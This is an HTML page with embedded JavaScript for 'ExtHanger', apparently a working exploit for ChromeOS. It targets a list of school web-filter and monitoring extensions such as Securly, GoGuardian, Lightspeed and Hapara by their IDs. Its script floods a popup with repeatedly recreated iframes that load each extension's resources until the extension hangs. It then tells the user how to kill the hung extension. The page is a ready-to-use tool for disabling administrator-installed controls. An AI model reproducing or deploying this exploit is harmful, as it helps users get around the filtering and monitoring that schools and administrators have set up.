<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>ExtHanger - Egduffuu</title>
  <link rel="shortcut icon" type="image/png" href='/favicon.png'>
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Varela+Round&display=swap">
  <style>
    body {
      font-family: 'Varela Round', sans-serif;
      margin: 0;
      padding: 0;
    }
    header {
      background-color: #333;
      color: #fff;
      padding: 10px;
      text-align: center;
      display: flex;
      align-items: center;
      justify-content: center;
    }
    .logo {
      width: 50px;
      height: 50px;
      margin-right: 10px;
    }
    .container {
      max-width: 800px;
      margin: 130px auto 0 auto;
      padding: 20px;
      text-align: center;
      display: flex;
      flex-direction: column;
      align-items: center;
    }
    select {
      margin-bottom: 10px;
    }
    button {
      font-family: 'Varela Round', sans-serif;
      background-color: #007bff;
      color: #fff;
      border: none;
      padding: 10px 20px;
      font-size: 16px;
      cursor: pointer;
      border-radius: 5px;
      margin-top: 10px;
    }
    button:hover {
      background-color: #0056b3;
    }
    .overlay {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.5);
      display: none;
      justify-content: center;
      align-items: center;
      z-index: 9999;
      color: #fff;
      font-size: 24px;
    }
    footer {
      background-color: #333;
      color: #fff;
      text-align: center;
      padding: 10px;
      position: fixed;
      bottom: 0;
      width: 100%;
    }
    .kill-extension-text {
      display: none;
      margin-top: 20px;
      margin-left: 40px;
      margin-right: 40px;
      text-align: center;
    }
  </style>
</head>
<body>

<header>
  <img src="https://cdn.jsdelivr.net/gh/Egduffuu/ExtHanger@main/favicon.png" alt="Logo" class="logo">
  <h1>ExtHanger</h1>
</header>

<div class="container">
  <p>ExtHang3r is an exploit that allows ChromeOS users to hang and kill extensions after the LTMEAT patch. This exploit should work in every new version of ChromeOS.</p>
  <label for="iframeSelect">Select extension:</label>
  <select id="iframeSelect">
    <option value="chrome-extension://joflmkccibkooplaeoinecjbmdebglab/fonts/Metropolis.css">Securly</option>
    <option value="chrome-extension://iheobagjkfklnlikgihanlhcddjoihkg/fonts/Metropolis.css">Securly (old)</option>
    <option value="chrome-extension://haldlgldplgnggkjaafhelgiaglafanh/youtube_injection.js">Goguardian</option>
    <option value="chrome-extension://baleiojnjpgeojohhhfbichcodgljmnj/blocked.html">LANSchool</option>
    <option value="chrome-extension://ddfbkhpmcdbciejenfcolaaiebnjcbfc/background/assets/pages/default-blocked.html">Linewize</option>
    <option value="chrome-extension://ghlpmldmjjhmdgmneoaibbegkjjbonbk/pages/blockPage.html">Blocksi</option>
    <option value="chrome-extension://igbgpehnbmhgdgjbhkkpedommgmfbeao/youtube_injection.js">Fortiguard</option>
    <option value="chrome-extension://jcdhmojfecjfmbdpchihbeilohgnbdci/blocked.html">Cisco Umbrella</option>
    <option value="chrome-extension://jdogphakondfdmcanpapfahkdomaicfa/img/ckauth19x.png">ContentKeeper</option>
    <option value="chrome-extension://odoanpnonilogofggaohhkdkdgbhdljp/img/ckauth19x.png">CK-Authenticator G3</option>
    <option value="chrome-extension://jfbecfmiegcjddenjhlbhlikcbfmnafd/notfound.html">Securly Classroom</option>
    <option value="chrome-extension://kbohafcopfpigkjdimdcdgenlhkmhbnc/blocked.html">Hapara</option>
    <option value="chrome-extension://aceopacgaepdcelohobicpffbbejnfac/blocked.html">Hapara (new ID)</option>
    <option value="chrome-extension://kmffehbidlalibfeklaefnckpidbodff/restricted.html">iboss</option>
    <option value="chrome-extension://adkcpkpghahmbopkjchobieckeoaoeem/icon-128.png">Lightspeed Filter Agent</option>
    <option value="chrome-extension://kkbmdgjggcdajckdlbngdjonpchpaiea/assets/icon-classroom-128.png">Lightspeed Classroom</option>
    <option value="chrome-extension://jbddgjglgkkneonnineaohdhabjbgopi/pages/message-page.html">InterCLASS Filtering Service</option>
    <option value="chrome-extension://ecjoghccnjlodjlmkgmnbnkdcbnjgden/resources/options.js">InterSafe GatewayConnection Agent</option>
    <option value="chrome-extension://pabjlbjcgldndnpjnokjakbdofjgnfia/image/allow_icon/shield_green_128x128.png">LoiLo Web Filters</option>
    <option value="chrome-extension://cgbbbjmgdpnifijconhamggjehlamcif/images/gopher-buddy_128x128_color.png">Gopher Buddy</option>
    <option value="chrome-extension://honjcnefekfnompampcpmcdadibmjhlk/blocked.html">LanSchool Web Helper</option>
    <option value="chrome-extension://cgigopjakkeclhggchgnhmpmhghcbnaf/models/model.json">IMTLazarus</option>
    <option value="chrome-extension://jjpmjccpemllnmgiaojaocgnakpmfgjg/licenses.html">Impero Backdrop</option>
    <option value="chrome-extension://fgmafhdohjkdhfaacgbgclmfgkgokgmb/block.html">Mobile Guardian</option>
  </select>
  <button onclick="warning();">Hang Extension!</button>
</div>

<div class="overlay" id="overlay">Hanging...</div>

<footer>
  <p>Made by <a href="https://github.com/Egduffuu/">Egduffuu</a></p>
</footer>

<div class="kill-extension-text" id="killExtensionText">
</div>

<script>
 var iframeCreationInterval;

  function createIframes(container, iframeSrc) {
    for (var i = 0; i < 50; i++) {
      var iframe = document.createElement('iframe');
      iframe.src = iframeSrc;
      iframe.style.width = '10px';
      iframe.style.height = '10px';
      iframe.setAttribute('frameborder', '0');
      container.appendChild(iframe);
    }
    
    setTimeout(function() {
      while (container.firstChild) {
        container.removeChild(container.firstChild);
      }
      createIframes(container, iframeSrc);
    }, 500);
  }
  
  function hangerPopup(selectedOption, selectedSrc) {
    var popupName = "Hanging " + selectedOption;
    var popup = window.open("", popupName, "width=10000,height=10000");
    popup.document.title = popupName;
    
    var popupDocument = popup.document;
    var popupBody = popupDocument.body;
    var iframeContainer = popupDocument.createElement('div');
    iframeContainer.id = 'iframeContainer';
    popupBody.appendChild(iframeContainer);
    var centeredText = popupDocument.createElement('div');
    centeredText.textContent = 'Click to hang ' + selectedOption;
    centeredText.style.position = 'absolute';
    centeredText.style.top = '50%';
    centeredText.style.left = '50%';
    centeredText.style.transform = 'translate(-50%, -50%)';
    centeredText.style.color = 'white';
    popupDocument.body.style.cursor = 'pointer';
    popupDocument.body.style.backgroundColor = 'black';
    popupBody.appendChild(centeredText);
    
    var clicked = false;
    var clickHandler = function() {
      if (!clicked) {
        clicked = true;

        centeredText.textContent = 'Hanging ' + selectedOption + '...';

	var popupName = "Open to Restore " + selectedOption;
	popup.document.title = popupName;
	      
	var blankTab = popup.open("about:blank", "_blank");
        var blankTabName = "Hanging " + selectedOption;
	blankTab.document.title = blankTabName;
	var blankTabDocument = blankTab.document;
	var blankTabBody = blankTabDocument.body;
	var centeredText2 = blankTabDocument.createElement('div');
   	centeredText2.textContent = 'Hanging ' + selectedOption + '...';
   	centeredText2.style.position = 'absolute';
   	centeredText2.style.top = '50%';
  	centeredText2.style.left = '50%';
  	centeredText2.style.transform = 'translate(-50%, -50%)';
  	centeredText2.style.color = 'white';
  	blankTabBody.appendChild(centeredText2);
        blankTabDocument.body.style.backgroundColor = 'black';
        blankTabDocument.body.appendChild(centeredText2);

        createIframes(iframeContainer, selectedSrc);
        
        setTimeout(function() {
          if (blankTab && !blankTab.closed) {
            blankTab.close();
            alert(selectedOption + " was hanged successfully! Now that it has been hanged, instructions for how to kill it and restore it are below.");
            window.document.getElementById("overlay").style.display = "none";
            var extensionId = selectedSrc.substring(selectedSrc.indexOf("//") + 2, selectedSrc.indexOf("/", selectedSrc.indexOf("//") + 2));
            window.document.getElementById("killExtensionText").innerHTML = "To kill the extension " + selectedOption + ", open a new tab and go to <strong>chrome://extensions/?id=" + extensionId + "</strong>. Then flip the allow access to file URLs switch. Now you can close that tab as well as this one. If you want to restore (unhang) the extension, open the window called Open to Restore and then that window should close itself restoring the extension in the process.";
            window.document.getElementById("killExtensionText").style.display = "block";
            popupDocument.addEventListener('mouseover', function() {
   		popup.close();
  		});
          }
        }, 5000);

        popupDocument.removeEventListener('click', clickHandler);
      }
    };

    popupDocument.addEventListener('click', clickHandler);
  }
  
  function warning() {
    var overlay = window.document.getElementById("overlay");
    overlay.style.display = "flex";
    var iframeSelect = window.document.getElementById("iframeSelect");
    var selectedOption = iframeSelect.options[iframeSelect.selectedIndex].text;
    var selectedSrc = iframeSelect.value;
    
    hangerPopup(selectedOption, selectedSrc);
  }
</script>
</body>
</html>
